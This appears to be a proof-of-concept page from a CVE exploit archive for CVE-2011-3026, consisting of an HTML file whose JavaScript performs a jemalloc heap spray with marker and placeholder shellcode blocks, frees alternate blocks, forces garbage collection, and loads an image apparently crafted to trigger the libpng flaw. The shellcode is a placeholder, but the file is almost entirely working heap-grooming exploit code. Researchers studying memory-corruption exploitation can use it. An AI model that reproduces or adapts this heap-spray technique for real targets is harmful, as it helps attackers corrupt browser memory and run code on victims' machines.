4837 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / cve-2011-3026.html HTML
<html>
<head>
<script>

function jemalloc_spray(blocks, size)
{
    // Copyright (c) 2012 Patroklos Argyroudis <argp at domain census-labs.com>
    // Copyright (c) 2012 Chariton Karamitas <huku at domain census-labs.com>
    // Copyright (c) 2012 Census, Inc. (http://www.census-labs.com/)

    var block_size = size / 2;

    // rop/bootstrap/whatever
    var marker = unescape("%ubeef%udead");
    marker += marker;

    // shellcode/payload
    var content = unescape("%u6666%u6666");

    while(content.length < (block_size / 2))
    {
        content += content;
    }

    var arr = [];

    for(i = 0; i < blocks; i++)
    {
        // construct the random block padding (corelanc0d3r's trick)
        var rnd1 = Math.floor(Math.random() * 1000) % 16;
        var rnd2 = Math.floor(Math.random() * 1000) % 16;
        var rnd3 = Math.floor(Math.random() * 1000) % 16;
        var rnd4 = Math.floor(Math.random() * 1000) % 16;

        var rndstr = "%u" + rnd1.toString() + rnd2.toString();
        rndstr += "%u" + rnd3.toString() + rnd4.toString();

        var padding = unescape(rndstr);
        
        while(padding.length < block_size - marker.length - content.length)
        {
            padding += padding;
        }

        // construct the block
        var block = marker + content + padding;

        // if required repeat the block
        while(block.length < block_size)
        {
            block += block;
        }

        // spray block
        arr[i] = block.substr(0);
    }

    // for debugging
    Math.asin(1);

    for(i = 0; i < blocks; i += 2)
    {
        delete(arr[i]);
        arr[i] = null;
    }

    var ret = trigger_gc();

    alert("After garbage collection: " + ret.length);

    // for debugging
    Math.atan2(6, 6);

    return arr;
}

function trigger_gc()
{
    var gc = [];
    
    for(i = 0; i < 100000; i++)
    {
        gc[i] = new Array();
    }

    return gc;
}

// 1000 spray blocks of size 630 (target run size: 1024)
var foo = jemalloc_spray(1000, 630);

// alert(foo.length);

</script>
</head>

<body>
CVE-2011-3026 is fun
<p><img src="cve-2011-3026.png">
</body>
</html>